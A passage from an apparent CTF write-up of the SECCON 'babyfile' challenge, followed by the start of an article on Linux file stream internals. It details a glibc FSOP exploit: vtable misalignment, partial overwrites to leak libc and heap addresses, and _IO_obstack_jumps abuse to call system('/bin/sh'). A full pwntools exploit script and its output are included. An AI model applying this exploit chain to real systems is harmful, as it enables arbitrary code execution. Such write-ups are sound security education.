0x559c0955e300: 0x0000000000000000      0x00007f99db7c05c0
0x559c0955e310: 0x0000000000000003      0x0000000000000000
0x559c0955e320: 0x0000000000000000      0x0000559c0955e380
0x559c0955e330: 0xffffffffffffffff      0x0000000000000000
0x559c0955e340: 0x0000000000000000      0x0000000000000000
0x559c0955e350: 0x0000000000000000      0x0000000000000000
0x559c0955e360: 0x0000000000000000      0x0000000000000000
0x559c0955e370: 0x0000000000000000      0x00007f99db7bc4a8
0x559c0955e380: 0x0000000100000001      0x00007f99db7c6580

It initializes the base buffer to a fresh BUFSIZE allocated buffer.

int
_IO_default_doallocate (FILE *fp)
{
  char *buf;

  buf = malloc(BUFSIZ);
  if (__glibc_unlikely (buf == NULL))
    return EOF;

  _IO_setb (fp, buf, buf+BUFSIZ, 1);
  return 1;
}

fp state after the _IO_default_doallocate:

0x559c0955e2a0: 0x00000000fbad2488      0x0000000000000000
0x559c0955e2b0: 0x0000000000000000      0x0000000000000000
0x559c0955e2c0: 0x0000000000000000      0x0000000000000000
0x559c0955e2d0: 0x0000000000000000      0x0000559c0955e480
0x559c0955e2e0: 0x0000559c09560480      0x0000000000000000
0x559c0955e2f0: 0x0000000000000000      0x0000000000000000
0x559c0955e300: 0x0000000000000000      0x00007f99db7c05c0
0x559c0955e310: 0x0000000000000003      0x0000000000000000
0x559c0955e320: 0x0000000000000000      0x0000559c0955e380
0x559c0955e330: 0xffffffffffffffff      0x0000000000000000
0x559c0955e340: 0x0000000000000000      0x0000000000000000
0x559c0955e350: 0x0000000000000000      0x0000000000000000
0x559c0955e360: 0x0000000000000000      0x0000000000000000
0x559c0955e370: 0x0000000000000000      0x00007f99db7bc4a8
0x559c0955e380: 0x0000000100000001      0x00007f99db7c6580

Once we have a valid pointer into the base buffer, we try to get into both the input and output buffer the base pointer. Given the input / output buffer are NULL and that fp->flags is 0xfbad1800 | 0x8000 (plus 0x8000 => _IO_USER_LOCK to not stuck into fflush), we do not have issues with the checks. The issue with the _IO_SYSREAD call is described in the code below.

_IO_new_file_underflow:

int
_IO_new_file_underflow (FILE *fp)
{
  ssize_t count;

  /* C99 requires EOF to be "sticky".  */
  if (fp->_flags & _IO_EOF_SEEN)
    return EOF;

  if (fp->_flags & _IO_NO_READS)
    {
      fp->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  if (fp->_IO_read_ptr < fp->_IO_read_end)
    return *(unsigned char *) fp->_IO_read_ptr;

  if (fp->_IO_buf_base == NULL)
    {
      /* Maybe we already have a push back pointer.  */
      if (fp->_IO_save_base != NULL)
	{
	  free (fp->_IO_save_base);
	  fp->_flags &= ~_IO_IN_BACKUP;
	}
      _IO_doallocbuf (fp);
    }

  /* FIXME This can/should be moved to genops ?? */
  if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
    {
      /* We used to flush all line-buffered stream.  This really isn't
	 required by any standard.  My recollection is that
	 traditional Unix systems did this for stdout.  stderr better
	 not be line buffered.  So we do just that here
	 explicitly.  --drepper */
      _IO_acquire_lock (stdout);

      if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
	  == (_IO_LINKED | _IO_LINE_BUF))
	_IO_OVERFLOW (stdout, EOF);

      _IO_release_lock (stdout);
    }

  _IO_switch_to_get_mode (fp);

  /* This is very tricky. We have to adjust those
     pointers before we call _IO_SYSREAD () since
     we may longjump () out while waiting for
     input. Those pointers may be screwed up. H.J. */
  fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
  fp->_IO_read_end = fp->_IO_buf_base;
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
    = fp->_IO_buf_base;

  /* Given the vtable is misaligned, _IO_SYSREAD will call 
  _IO_default_pbackfail, the code is given after _IO_new_file_underflow */
  count = _IO_SYSREAD (fp, fp->_IO_buf_base,
		       fp->_IO_buf_end - fp->_IO_buf_base);


  if (count <= 0)
    {
      if (count == 0)
	fp->_flags |= _IO_EOF_SEEN;
      else
	fp->_flags |= _IO_ERR_SEEN, count = 0;
  }
  fp->_IO_read_end += count;
  if (count == 0)
    {
      /* If a stream is read to EOF, the calling application may switch active
	 handles.  As a result, our offset cache would no longer be valid, so
	 unset it.  */
      fp->_offset = _IO_pos_BAD;
      return EOF;
    }
  if (fp->_offset != _IO_pos_BAD)
    _IO_pos_adjust (fp->_offset, count);
  return *(unsigned char *) fp->_IO_read_ptr;
}
libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)

_IO_default_pbackfail:

int
_IO_default_pbackfail (FILE *fp, int c)
{
  if (fp->_IO_read_ptr > fp->_IO_read_base && !_IO_in_backup (fp)
      && (unsigned char) fp->_IO_read_ptr[-1] == c)
    --fp->_IO_read_ptr;
  else
    {
      /* Need to handle a filebuf in write mode (switch to read mode). FIXME!*/
      if (!_IO_in_backup (fp))
	{
	  /* We need to keep the invariant that the main get area
	     logically follows the backup area.  */
	  if (fp->_IO_read_ptr > fp->_IO_read_base && _IO_have_backup (fp))
	    {
	      if (save_for_backup (fp, fp->_IO_read_ptr))
		return EOF;
	    }
	  else if (!_IO_have_backup (fp))
	    {
        // !! We should take this path cuz there is no save buffer plus we do not have the backup flag
	      /* No backup buffer: allocate one. */
	      /* Use nshort buffer, if unused? (probably not)  FIXME */
	      int backup_size = 128;
	      char *bbuf = (char *) malloc (backup_size);
	      if (bbuf == NULL)
		return EOF;
	      fp->_IO_save_base = bbuf;
	      fp->_IO_save_end = fp->_IO_save_base + backup_size;
	      fp->_IO_backup_base = fp->_IO_save_end;
	    }
	  fp->_IO_read_base = fp->_IO_read_ptr;
	  _IO_switch_to_backup_area (fp);
	}
      else if (fp->_IO_read_ptr <= fp->_IO_read_base)
	{
	  /* Increase size of existing backup buffer. */
	  size_t new_size;
	  size_t old_size = fp->_IO_read_end - fp->_IO_read_base;
	  char *new_buf;
	  new_size = 2 * old_size;
	  new_buf = (char *) malloc (new_size);
	  if (new_buf == NULL)
            return EOF;
	  memcpy (new_buf + (new_size - old_size), fp->_IO_read_base,
		  old_size);
	  free (fp->_IO_read_base);
	  _IO_setg (fp, new_buf, new_buf + (new_size - old_size),
		    new_buf + new_size);
	  fp->_IO_backup_base = fp->_IO_read_ptr;
	}

      *--fp->_IO_read_ptr = c;
    }
  return (unsigned char) c;
}
libc_hidden_def (_IO_default_pbackfail)

fp state after the _IO_new_file_underflow:

0x559c0955e2a0: 0x00000000fbad2588      0x0000559c0956050f
0x559c0955e2b0: 0x0000559c09560590      0x0000559c09560490
0x559c0955e2c0: 0x0000559c0955e480      0x0000559c0955e480
0x559c0955e2d0: 0x0000559c0955e480      0x0000559c0955e480
0x559c0955e2e0: 0x0000559c09560480      0x0000559c0955e480
0x559c0955e2f0: 0x0000559c09560510      0x0000559c0955e480
0x559c0955e300: 0x0000000000000000      0x00007f99db7c05c0
0x559c0955e310: 0x0000000000000003      0x0000000000000000
0x559c0955e320: 0x0000000000000000      0x0000559c0955e380
0x559c0955e330: 0xffffffffffffffff      0x0000000000000000
0x559c0955e340: 0x0000000000000000      0x0000000000000000
0x559c0955e350: 0x0000000000000000      0x0000000000000000
0x559c0955e360: 0x0000000000000000      0x0000000000000000
0x559c0955e370: 0x0000000000000000      0x00007f99db7bc460
0x559c0955e380: 0x0000000100000001      0x00007f99db7c6580

Once we have the pointers at the right place, we can simply do some partial overwrites to the portion of the heap that contains a libc pointer. Indeed by taking a look at the memory at fp->_IO_base_buffer & ~0xff (to avoid 4 bits bruteforce) we can that we can directly reach a libc pointer:

0x5649e8077400: 0x0000000000000000      0x0000000000000000
0x5649e8077410: 0x0000000000000000      0x0000000000000000
0x5649e8077420: 0x0000000000000000      0x0000000000000000
0x5649e8077430: 0x0000000000000000      0x0000000000000000
0x5649e8077440: 0x0000000000000000      0x0000000000000000
0x5649e8077450: 0x0000000000000000      0x0000000000000000
0x5649e8077460: 0x0000000000000000      0x0000000000000000
0x5649e8077470: 0x00007f4092dc3f60      0x0000000000002011
0x5649e8077480: 0x0000000000000000      0x0000000000000000
0x5649e8077490: 0x0000000000000000      0x0000000000000000

Then we have to actually doing the partial overwrite by corrupting certain pointers to leak this address with the help of _IO_fflush:

int
_IO_fflush (FILE *fp)
{
  if (fp == NULL)
    return _IO_flush_all ();
  else
    {
      int result;
      CHECK_FILE (fp, EOF);
      _IO_acquire_lock (fp);
      result = _IO_SYNC (fp) ? EOF : 0;
      _IO_release_lock (fp);
      return result;
    }
}
libc_hidden_def (_IO_fflush)

It ends up calling _IO_new_file_sync(fp):

int
_IO_new_file_sync (FILE *fp)
{
  ssize_t delta;
  int retval = 0;

  /*    char* ptr = cur_ptr(); */
  if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF;
  delta = fp->_IO_read_ptr - fp->_IO_read_end;
  if (delta != 0)
    {
      off64_t new_pos = _IO_SYSSEEK (fp, delta, 1);
      if (new_pos != (off64_t) EOF)
	fp->_IO_read_end = fp->_IO_read_ptr;
      else if (errno == ESPIPE)
	; /* Ignore error from unseekable devices. */
      else
	retval = EOF;
    }
  if (retval != EOF)
    fp->_offset = _IO_pos_BAD;
  /* FIXME: Cleanup - can this be shared? */
  /*    setg(base(), ptr, ptr); */
  return retval;
}
libc_hidden_ver (_IO_new_file_sync, _IO_file_sync)

I already talked about the way we can gain arbitrary read with FSOP attack on stdout in this article. The way we will get a leak is almost the same, first we need to trigger the first condition in _IO_new_file_sync in such a way that fp->_IO_write_ptr > fp->_IO_write_base will trigger _IO_do_flush(fp). Then _IO_do_flush triggers the classic code path I dump right below. I will not comment all of it, the only thing you have to remind is that given most of the buffers are already initialized to a valid heap address beyond the target we do not have to rewrite them, this way we will significantly reduce the amount of partial overwrite.

#define _IO_do_flush(_f) \
  ((_f)->_mode <= 0							      \
   ? _IO_do_write(_f, (_f)->_IO_write_base,				      \
		  (_f)->_IO_write_ptr-(_f)->_IO_write_base)		      \
   : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base,		      \
		   ((_f)->_wide_data->_IO_write_ptr			      \
		    - (_f)->_wide_data->_IO_write_base)))

Condition: (_f)->_IO_write_ptr-(_f)->_IO_write_base) >= sizeof(uint8_t* ), (_f)->_IO_write_base == target.

int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
  return (to_do == 0
	  || (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)

static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
  size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      off64_t new_pos
	= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
	return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do);
  if (fp->_cur_column && count)
    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;
  fp->_IO_write_end = (fp->_mode <= 0
		       && (fp->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
		       ? fp->_IO_buf_base : fp->_IO_buf_end);
  return count;
}

Note: Given fp->_IO_read_end != fp->_IO_write_base, fp->_IO_read_end is the save buffer that has been allocated and switched in _IO_default_pbackfail and that _IO_write_base contains the target memory area, we have to include the _IO_IS_APPENDING flag into fp->_flags to avoid the _IO_SYSSEEK which would fail and then return. Therefore we can finally reach the _IO_SYSWRITE that will leak the libc pointer.

The leak phase gives for me something like this:

# do_allocate
partial_write(pwn.p8(0xa8), File.vtable)
fflush()

# _IO_file_underflow => _IO_default_pbackfail
partial_write(pwn.p8(0x60), File.vtable)
fflush()

write_ptr(pwn.p64(0xfbad1800 | 0x8000), File.flags)

partial_write(pwn.p8(0x70), File._IO_write_base)

partial_write(pwn.p8(0x78), File._IO_write_ptr)
partial_write(pwn.p8(0xa0), File.vtable)
write_ptr(pwn.p64(1), File.fileno)
fflush()

leak = pwn.u64(io.recv(8).ljust(8, b"\x00")) - 0x2160c0 + 0x2d160
pwn.log.info(f"libc: {hex(leak)}")

Heap leak

To use the _IO_obstack_jumps technique, we have to craft a custom obstack structure on the heap (right on our filestream in fact) and thus we need to leak the heap to be able reference it. But given we already have a libc leak that's very easy, within the main_arena are stored some heap pointers, which means we just have to use the same _IO_fflush trick to flush the filestream and then leak a heap pointer stored in the main_arena. I wrote a function that leaks directly the right pointer from a given address:

def leak_ptr(ptr: bytes) -> int:
    """
    We assume flags are right
    """

    write_ptr(ptr, File._IO_write_base)
    
    dest = (int.from_bytes(ptr, byteorder="little")+8).to_bytes(8, byteorder='little')

    write_ptr(dest, File._IO_write_ptr)

    fflush()
    ret = pwn.u64(io.recv(8).ljust(8, b"\x00"))

    return ret

"""
[...]
"""

leak_main_arena = leak + 0x1ed5a0

heap = leak_ptr(pwn.p64(leak_main_arena)) - 0x2a0
pwn.log.info(f"heap: {hex(heap)}")

obstack exploitation

As far I know, obstack has never been used in CTF even though it can be leveraged as a very good call primitive (and as said before it needs a heap and libc to be used). Basically, the _IO_obstack_jumps vtable looks like this:

/* the jump table.  */
const struct _IO_jump_t _IO_obstack_jumps libio_vtable attribute_hidden =
{
    JUMP_INIT_DUMMY,
    JUMP_INIT(finish, NULL),
    JUMP_INIT(overflow, _IO_obstack_overflow),
    JUMP_INIT(underflow, NULL),
    JUMP_INIT(uflow, NULL),
    JUMP_INIT(pbackfail, NULL),
    JUMP_INIT(xsputn, _IO_obstack_xsputn),
    JUMP_INIT(xsgetn, NULL),
    JUMP_INIT(seekoff, NULL),
    JUMP_INIT(seekpos, NULL),
    JUMP_INIT(setbuf, NULL),
    JUMP_INIT(sync, NULL),
    JUMP_INIT(doallocate, NULL),
    JUMP_INIT(read, NULL),
    JUMP_INIT(write, NULL),
    JUMP_INIT(seek, NULL),
    JUMP_INIT(close, NULL),
    JUMP_INIT(stat, NULL),
    JUMP_INIT(showmanyc, NULL),
    JUMP_INIT(imbue, NULL)
};

Given when _IO_SYNC is called in _IO_fflush the second argument is 0x1, we cannot call functions like _IO_obstack_xsputn that need buffer as arguments, that's the reason why we have to dig into _IO_obstack_overflow.

static int
_IO_obstack_overflow (FILE *fp, int c)
{
  struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;
  int size;

  /* Make room for another character.  This might as well allocate a
     new chunk a memory and moves the old contents over.  */
  assert (c != EOF);
  obstack_1grow (obstack, c);

  /* Setup the buffer pointers again.  */
  fp->_IO_write_base = obstack_base (obstack);
  fp->_IO_write_ptr = obstack_next_free (obstack);
  size = obstack_room (obstack);
  fp->_IO_write_end = fp->_IO_write_ptr + size;
  /* Now allocate the rest of the current chunk.  */
  obstack_blank_fast (obstack, size);

  return c;
}

The struct _IO_obstack_file is defined as follows:

struct _IO_obstack_file
{
  struct _IO_FILE_plus file;
  struct obstack *obstack;
};

Which means right after the vtable field within the file stream should be a pointer toward a struct obstack.

struct obstack          /* control current object in current chunk */
{
  long chunk_size;              /* preferred size to allocate chunks in */
  struct _obstack_chunk *chunk; /* address of current struct obstack_chunk */
  char *object_base;            /* address of object we are building */
  char *next_free;              /* where to add next char to current object */
  char *chunk_limit;            /* address of char after current chunk */
  union
  {
    PTR_INT_TYPE tempint;
    void *tempptr;
  } temp;                       /* Temporary for some macros.  */
  int alignment_mask;           /* Mask of alignment for each object. */
  /* These prototypes vary based on 'use_extra_arg', and we use
     casts to the prototypeless function type in all assignments,
     but having prototypes here quiets -Wstrict-prototypes.  */
  struct _obstack_chunk *(*chunkfun) (void *, long);
  void (*freefun) (void *, struct _obstack_chunk *);
  void *extra_arg;              /* first arg for chunk alloc/dealloc funcs */
  unsigned use_extra_arg : 1;     /* chunk alloc/dealloc funcs take extra arg */
  unsigned maybe_empty_object : 1; /* There is a possibility that the current
				      chunk contains a zero-length object.  This
				      prevents freeing the chunk if we allocate
				      a bigger chunk to replace it. */
  unsigned alloc_failed : 1;      /* No longer used, as we now call the failed
				     handler on error, but retained for binary
				     compatibility.  */
};

Once obstack_1grow is called, if __o->next_free + 1 > __o->chunk_limit, _obstack_newchunk gets called.

# define obstack_1grow(OBSTACK, datum)					      \
  __extension__								      \
    ({ struct obstack *__o = (OBSTACK);				      \
       if (__o->next_free + 1 > __o->chunk_limit)			      \
	 _obstack_newchunk (__o, 1);					      \
       obstack_1grow_fast (__o, datum);				      \
       (void) 0; })

Condition: __o->next_free + 1 > __o->chunk_limit.

/* Allocate a new current chunk for the obstack *H
   on the assumption that LENGTH bytes need to be added
   to the current object, or a new object of length LENGTH allocated.
   Copies any partial object from the end of the old chunk
   to the beginning of the new one.  */

void
_obstack_newchunk (struct obstack *h, int length)
{
  struct _obstack_chunk *old_chunk = h->chunk;
  struct _obstack_chunk *new_chunk;
  long new_size;
  long obj_size = h->next_free - h->object_base;
  long i;
  long already;
  char *object_base;

  /* Compute size for new chunk.  */
  new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100;
  if (new_size < h->chunk_size)
    new_size = h->chunk_size;

  /* Allocate and initialize the new chunk.  */
  new_chunk = CALL_CHUNKFUN (h, new_size);
  if (!new_chunk)
    (*obstack_alloc_failed_handler)();
  h->chunk = new_chunk;
  new_chunk->prev = old_chunk;
  new_chunk->limit = h->chunk_limit = (char *) new_chunk + new_size;

  /* Compute an aligned object_base in the new chunk */
  object_base =
    __PTR_ALIGN ((char *) new_chunk, new_chunk->contents, h->alignment_mask);

  /* Move the existing object to the new chunk.
     Word at a time is fast and is safe if the object
     is sufficiently aligned.  */
  if (h->alignment_mask + 1 >= DEFAULT_ALIGNMENT)
    {
      for (i = obj_size / sizeof (COPYING_UNIT) - 1;
	   i >= 0; i--)
	((COPYING_UNIT *) object_base)[i]
	  = ((COPYING_UNIT *) h->object_base)[i];
      /* We used to copy the odd few remaining bytes as one extra COPYING_UNIT,
	 but that can cross a page boundary on a machine
	 which does not do strict alignment for COPYING_UNITS.  */
      already = obj_size / sizeof (COPYING_UNIT) * sizeof (COPYING_UNIT);
    }
  else
    already = 0;
  /* Copy remaining bytes one by one.  */
  for (i = already; i < obj_size; i++)
    object_base[i] = h->object_base[i];

  /* If the object just copied was the only data in OLD_CHUNK,
     free that chunk and remove it from the chain.
     But not if that chunk might contain an empty object.  */
  if (!h->maybe_empty_object
      && (h->object_base
	  == __PTR_ALIGN ((char *) old_chunk, old_chunk->contents,
			  h->alignment_mask)))
    {
      new_chunk->prev = old_chunk->prev;
      CALL_FREEFUN (h, old_chunk);
    }

  h->object_base = object_base;
  h->next_free = h->object_base + obj_size;
  /* The new chunk certainly contains no empty object yet.  */
  h->maybe_empty_object = 0;
}
# ifdef _LIBC
libc_hidden_def (_obstack_newchunk)
# endif

The interesting part of the function is the call to the CALL_CHUNKFUN macro that calls a raw unencrypted function pointer referenced by the obstack structure with either a controlled argument ((h)->extra_arg) or only with the size.

# define CALL_FREEFUN(h, old_chunk) \
  do { \
      if ((h)->use_extra_arg)						      \
	(*(h)->freefun)((h)->extra_arg, (old_chunk));			      \
      else								      \
	(*(void (*)(void *))(h)->freefun)((old_chunk));		      \
    } while (0)

If I summarize, to call system("/bin/sh" we need to have:

__o->next_free + 1 > __o->chunk_limit
(h)->freefun = &system
(h)->extra_arg = &"/bin/sh"
(h)->use_extra_arg != 0

Which gives:

_IO_obstack_jumps = leak + 0x1E9260
pwn.log.info(f"_IO_obstack_jumps: {hex(_IO_obstack_jumps)}")

# edit vtable => _IO_obstack_jumps
write_ptr(pwn.p64(_IO_obstack_jumps - 8 * 9), File.vtable)
write_ptr(pwn.p64(heap + 0x2a0), File.obstack)

partial_write(pwn.p8(0xff), File._IO_read_base)

write_ptr(pwn.p64(libc.sym.system), obstack.chunkfun) # fn ptr, system
write_ptr(pwn.p64(next(libc.search(b'/bin/sh'))), obstack.extra_arg) # arg
partial_write(pwn.p8(True), obstack.use_extra_arg)

fflush()
# system("/bin/sh")

PROFIT

After optimizing a lot my exploit (my french connection sucks), here we are:

nasm@off:~/Documents/pwn/seccon/babyfile$ time python3 exploit.py REMOTE HOST=babyfile.seccon.games PORT=3157
[*] '/home/nasm/Documents/pwn/seccon/babyfile/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/nasm/Documents/pwn/seccon/babyfile/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to babyfile.seccon.games on port 3157: Done
[*] libc: 0x7fe2bc538000
[*] heap: 0x55fd27776000
[*] _IO_obstack_jumps: 0x7fe2bc721260
[*] Switching to interactive mode
SECCON{r34d_4nd_wr173_4nywh3r3_w17h_f1l3_57ruc7ur3}
[*] Got EOF while reading in interactive
$

Annexes

Final exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn


# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('chall')
libc = pwn.context.binary = pwn.ELF('libc-2.31.so')
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
# pwn.context.timeout = 1000

host = pwn.args.HOST or '127.0.0.1'
port = int(pwn.args.PORT or 1337)


def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return pwn.process([exe.path] + argv, *a, **kw)


def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io


def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)


gdbscript = '''
source /home/nasm/Downloads/pwndbg/gdbinit.py
'''.format(**locals())

io = None
io = start()

class File:
    flags          = 0x0
    _IO_read_base  = 24
    _IO_read_end   = 0x10
    _IO_write_base = 0x20
    _IO_write_ptr  = 0x28
    _IO_write_end  = 0x30
    _IO_buf_base   = 0x38
    _IO_buf_end    = 0x40
    fileno         = 0x70
    vtable         = 0xd8
    obstack       = 0xe0

class obstack:
    chunkfun       = 56
    extra_arg      = 56+16
    use_extra_arg  = 56+16+8

def fflush():
    io.sendlineafter(b"> ", b"1")

def trick(offt, data):
    io.sendlineafter(b"> ", b"2")
    io.sendlineafter(b"offset: ", str(offt).encode())
    io.sendlineafter(b"value: ", data)

def leave():
    io.sendlineafter(b"> ", b"0")

def write_ptr(ptr: bytes, offt: int, debug=True):
    for i in range(8):
        if ptr[i]:
            trick(offt + i, str(ptr[i]).encode())

def partial_write2(ptr: bytes, offt: int):
    for i in range(2):
        trick(offt + i, str(ptr[i]).encode())

def partial_write(ptr: bytes, offt: int):
    for i in range(1):
        trick(offt + i, str(ptr[i]).encode())

def leak_ptr(ptr: bytes) -> int:
    write_ptr(ptr, File._IO_write_base)
    
    dest = (int.from_bytes(ptr, byteorder="little")+8).to_bytes(8, byteorder='little')

    write_ptr(dest, File._IO_write_ptr)

    fflush()
    ret = pwn.u64(io.recv(8).ljust(8, b"\x00"))

    return ret

def main():
    # do_allocate
    partial_write(pwn.p8(0xa8), File.vtable)
    fflush()

    # _IO_file_underflow => _IO_default_pbackfail
    partial_write(pwn.p8(0x60), File.vtable)
    fflush()

    """
    int
    _IO_default_pbackfail (FILE *fp, int c)
    => not _IO_IN_BACKUP         0x0100
    => _IO_read_base == _IO_write_ptr
    => _IO_read_end == _IO_write_ptr + 8
    => _IO_write_end = right size
    """

    write_ptr(pwn.p64(0xfbad1800 | 0x8000), File.flags)

    partial_write(pwn.p8(0x70), File._IO_write_base)

    partial_write(pwn.p8(0x78), File._IO_write_ptr)
    partial_write(pwn.p8(0xa0), File.vtable)
    write_ptr(pwn.p64(1), File.fileno)
    fflush()

    leak = pwn.u64(io.recv(8).ljust(8, b"\x00")) - 0x2160c0 + 0x2d160
    pwn.log.info(f"libc: {hex(leak)}")
    libc.address = leak

    leak_main_arena = leak + 0x1ed5a0

    heap = leak_ptr(pwn.p64(leak_main_arena)) - 0x2a0
    pwn.log.info(f"heap: {hex(heap)}")

    _IO_obstack_jumps = leak + 0x1E9260
    pwn.log.info(f"_IO_obstack_jumps: {hex(_IO_obstack_jumps)}")

    # edit vtable => _IO_obstack_jumps
    write_ptr(pwn.p64(_IO_obstack_jumps - 8 * 9), File.vtable)
    write_ptr(pwn.p64(heap + 0x2a0), File.obstack)

    partial_write(pwn.p8(0xff), File._IO_read_base)

    write_ptr(pwn.p64(libc.sym.system), obstack.chunkfun) # fn ptr, system
    write_ptr(pwn.p64(next(libc.search(b'/bin/sh'))), obstack.extra_arg) # arg
    partial_write(pwn.p8(True), obstack.use_extra_arg)

    fflush()
    # system("/bin/sh")

    io.sendline(b"cat flag-f81d1f481db83712a1128dc9b72d5503.txt")
    io.interactive()

if __name__ == "__main__":
    main()

"""
type = struct _IO_FILE {
/*      0      |       4 */    int _flags;
/* XXX  4-byte hole      */
/*      8      |       8 */    char *_IO_read_ptr;
/*     16      |       8 */    char *_IO_read_end;
/*     24      |       8 */    char *_IO_read_base;
/*     32      |       8 */    char *_IO_write_base;
/*     40      |       8 */    char *_IO_write_ptr;
/*     48      |       8 */    char *_IO_write_end;
/*     56      |       8 */    char *_IO_buf_base;
/*     64      |       8 */    char *_IO_buf_end;
/*     72      |       8 */    char *_IO_save_base;
/*     80      |       8 */    char *_IO_backup_base;
/*     88      |       8 */    char *_IO_save_end;
/*     96      |       8 */    struct _IO_marker *_markers;
/*    104      |       8 */    struct _IO_FILE *_chain;
/*    112      |       4 */    int _fileno;
/*    116      |       4 */    int _flags2;
/*    120      |       8 */    __off_t _old_offset;
/*    128      |       2 */    unsigned short _cur_column;
/*    130      |       1 */    signed char _vtable_offset;
/*    131      |       1 */    char _shortbuf[1];
/* XXX  4-byte hole      */
/*    136      |       8 */    _IO_lock_t *_lock;
/*    144      |       8 */    __off64_t _offset;
/*    152      |       8 */    struct _IO_codecvt *_codecvt;
/*    160      |       8 */    struct _IO_wide_data *_wide_data;
/*    168      |       8 */    struct _IO_FILE *_freeres_list;
/*    176      |       8 */    void *_freeres_buf;
/*    184      |       8 */    size_t __pad5;
/*    192      |       4 */    int _mode;
/*    196      |      20 */    char _unused2[20];

                               /* total size (bytes):  216 */
                             }

struct obstack          /* control current object in current chunk */
{
  long chunk_size;              /* preferred size to allocate chunks in */
  struct _obstack_chunk *chunk; /* address of current struct obstack_chunk */
  char *object_base;            /* address of object we are building */
  char *next_free;              /* where to add next char to current object */
  char *chunk_limit;            /* address of char after current chunk */
  union
  {
    PTR_INT_TYPE tempint;
    void *tempptr;
  } temp;                       /* Temporary for some macros.  */
  int alignment_mask;           /* Mask of alignment for each object. */
  /* These prototypes vary based on 'use_extra_arg', and we use
     casts to the prototypeless function type in all assignments,
     but having prototypes here quiets -Wstrict-prototypes.  */
  struct _obstack_chunk *(*chunkfun) (void *, long);
  void (*freefun) (void *, struct _obstack_chunk *);
  void *extra_arg;              /* first arg for chunk alloc/dealloc funcs */
  unsigned use_extra_arg : 1;     /* chunk alloc/dealloc funcs take extra arg */
  unsigned maybe_empty_object : 1; /* There is a possibility that the current
				      chunk contains a zero-length object.  This
				      prevents freeing the chunk if we allocate
				      a bigger chunk to replace it. */
  unsigned alloc_failed : 1;      /* No longer used, as we now call the failed
				     handler on error, but retained for binary
				     compatibility.  */
};

nasm@off:~/Documents/pwn/seccon/babyfile$ time python3 exploit.py REMOTE HOST=babyfile.seccon.games PORT=3157
[*] '/home/nasm/Documents/pwn/seccon/babyfile/chall'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/nasm/Documents/pwn/seccon/babyfile/libc-2.31.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to babyfile.seccon.games on port 3157: Done
[*] libc: 0x7fe2bc538000
[*] heap: 0x55fd27776000
[*] _IO_obstack_jumps: 0x7fe2bc721260
[*] Switching to interactive mode
SECCON{r34d_4nd_wr173_4nywh3r3_w17h_f1l3_57ruc7ur3}
[*] Got EOF while reading in interactive
$
"""

Linux file stream internals for fun and profit

Fri, 19 Aug 2022 00:00:00 GMT

Introduction

File streams are now a very common attack surface, here is a high level introduction that should make you understand the design of known attacks beyond the code reading for a particular function. I already talked about FSOP here. This article reviews glibc 2.36. Most of this article comes from this awesome series of articles about the _IO_FILE strcuture.

Global design

As said in my previous writeup:

Basically on linux “everything is a file” from the character device the any stream (error, input, output, opened file) we can interact with a resource by just by opening it and getting a file descriptor on it, right ? This way each file descripor has an associated structure called FILE you may have used if you have already done some stuff with files on linux.

The struct _IO_FILE is defined as follows:

/* The tag name of this struct is _IO_FILE to preserve historic
   C++ mangled names for functions taking FILE* arguments.
   That name should not be used in new code.  */
struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
